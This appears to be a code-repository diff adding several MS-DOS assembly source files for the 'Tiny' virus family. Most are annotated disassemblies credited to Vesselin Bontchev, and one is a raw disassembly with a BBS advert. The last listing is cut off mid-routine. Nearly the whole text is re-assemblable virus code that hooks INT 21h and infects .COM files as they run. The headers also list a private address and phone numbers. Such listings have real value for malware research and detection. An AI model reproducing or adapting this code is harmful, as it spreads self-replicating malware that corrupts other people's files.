; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-156 º
; º Disassembled by Vesselin Bontchev, September 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
xchg ax,cx
vect_cpy:
xchg ax,cx
xchg ax,word ptr es:[di-(32-21)*4]
stosw
jcxz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg ax,bx ; Save the file handle in BX
mov al,0
call lseek
mov ah,3F ; Read the first 4 bytes of the file
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek
push ax ; Save file length
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov al,0 ; Seek to the file beginning
call lseek
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
lseek:
mov ah,42 ; Lseek either to file beginning or to file end
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dh,6 ; Put 6 in DH and 4 in CL
mov cl,4
ret ; Done
v_end equ $ ; End of virus body
code ends
end start


178
MSDOS/Virus.MSDOS.Unknown.tiny-158.asm Normal file
View File

@ -0,0 +1,178 @@
page ,132
name TINY158
title The 'Tiny' virus, version TINY-158
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-158 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
xchg ax,cx
vect_cpy:
xchg ax,cx
xchg ax,word ptr es:[di-(32-21)*4]
stosw
jcxz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start


178
MSDOS/Virus.MSDOS.Unknown.tiny-159.asm Normal file
View File

@ -0,0 +1,178 @@
page ,132
name TINY159
title The 'Tiny' virus, version TINY-159
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-159 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60 ; Offset
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
vect_cpy:
xchg ax,word ptr es:[di-(32-21)*4]
stosw
xchg ax,cx
test ax,ax
jz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start


178
MSDOS/Virus.MSDOS.Unknown.tiny-160.asm Normal file
View File

@ -0,0 +1,178 @@
page ,132
name TINY160
title The 'Tiny' virus, version TINY-160
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-160 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov cl,2 ; The vector is 2 words long
mov ax,int_21-first4+seg_60 ; Offset
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
vect_cpy:
xchg ax,word ptr es:[di-(32-21)*4]
stosw
mov ax,es ; Segment
loop vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start


126
MSDOS/Virus.MSDOS.Unknown.tiny-163.asm Normal file
View File

@ -0,0 +1,126 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ S ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 4-Aug-90 ÛÛ
;ÛÛ Version: ÛÛ
;ÛÛ Passes: 9 Analysis Options on: H ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_2e equ 1ABh ; (946E:01AB=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
s proc far
start:
jmp loc_1 ; (0108)
db 0CDh, 20h, 7, 8, 9
loc_1:
call sub_1 ; (010B)
s endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop si
sub si,10Bh
mov bp,data_1[si] ; (946E:01A0=0)
add bp,103h
lea dx,[si+1A2h] ; Load effective addr
xor cx,cx ; Zero register
mov ah,4Eh ; 'N'
loc_2:
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_6 ; Jump if carry Set
mov dx,9Eh
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,3Fh ; '?'
lea dx,[si+1A8h] ; Load effective addr
mov di,dx
mov cx,3
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
cmp byte ptr [di],0E9h
je loc_4 ; Jump if equal
loc_3:
mov ah,4Fh ; 'O'
jmp short loc_2 ; (0120)
loc_4:
mov dx,[di+1]
mov data_1[si],dx ; (946E:01A0=0)
xor cx,cx ; Zero register
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,di
mov cx,2
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
cmp word ptr [di],807h
je loc_3 ; Jump if equal
xor dx,dx ; Zero register
xor cx,cx ; Zero register
mov ax,4202h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
cmp dx,0
jne loc_3 ; Jump if not equal
cmp ah,0FEh
jae loc_3 ; Jump if above or =
mov ds:data_2e[si],ax ; (946E:01AB=0)
mov ah,40h ; '@'
lea dx,[si+105h] ; Load effective addr
mov cx,0A3h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc loc_5 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
mov dx,1
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
lea dx,[si+1ABh] ; Load effective addr
mov cx,2
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_5:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_6:
jmp bp ;*Register jump
data_1 dw 0 ; Data table (indexed access)
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
sub_1 endp
seg_a ends
end start
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

177
MSDOS/Virus.MSDOS.Unknown.tiny-167.asm Normal file
View File

@ -0,0 +1,177 @@
page ,132
name TINY167
title The 'Tiny' virus, version TINY-167
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-167 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
call v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
pop si ; Determine the start addres of the virus body
add si,[si-2]
; Save the original first 4 bytes of the infected file on the stack:
push word ptr ds:[si-4]
push word ptr ds:[si-2]
push ax ; Save AX (to keep programs as DISKCOPY happy)
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov cl,2 ; The vector is 2 words long
mov ax,int_21-first4+seg_60 ; Offset
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
vect_cpy:
xchg ax,word ptr es:[di-(32-21)*4]
stosw
mov ax,es ; Segment
loop vect_cpy ; Loop until done
run:
mov di,offset start ; Point DI at program start
pop ax ; Restore AX
pop word ptr ds:[di+2] ; Restore the original first 4 bytes
pop word ptr ds:[di] ; of the file
push ds ; ES := DS
pop es
jmp di ; Go
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E8 ; Near CALL opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the CALL's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start


199
MSDOS/Virus.MSDOS.Unknown.tiny-198.asm Normal file
View File

@ -0,0 +1,199 @@
page ,132
name TINY198
title The 'Tiny' virus, version TINY-198
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-198 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-v_entry
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
v_entry:
call self ; Determine the start addres of the virus body
self:
pop si
sub si,3
push ax ; Save AX (to keep programs as DISKCOPY happy)
; Check whether the virus is already in memory and just run the program if so:
mov ah,0E9
int 21
mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len ; CX := virus length
rep movsb ; Move the virus body there
; Transfer control to cont: by PUSHing its address
; on the stack and executing RETF:
push es
mov ax,cont-v_entry+seg_60
push ax
retf
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
; Resume execution from here (but already in segment 60h):
cont:
; Install new INT 21h handler and move the old one at INT 32h:
mov di,21*4
mov cl,2
mov ax,int_21-v_entry+seg_60
cld
lp:
push word ptr es:[di] ; Get old handler's address
pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h
stosw ; Install the new one
mov ax,cs
loop lp ; Loop until done
; Save the original first 4 bytes of the infected program on the stack:
push word ptr cs:[first4-v_entry+seg_60]
push word ptr cs:[first4+2-v_entry+seg_60]
run_pgm:
mov di,offset start ; Point DI at program's start
pop word ptr [di+2] ; Restore the first 4 bytes of the program
pop word ptr [di]
pop ax ; Restore the original value of AX
push ds
push ds ; ES := DS
pop es
push di ; Push 100h on the stack
retf
mem_chk:
; Push the original first 4 bytes of the infected program on the stack:
push word ptr [si+first4-v_entry]
push word ptr [si+first4+2-v_entry]
jmp run_pgm ; And run the original program
int_21: ; New INT 21h handler
cmp ah,0E9 ; Memory check?
je mem_chk ; If infected, run the original program
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
mov bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,first4-v_entry+seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
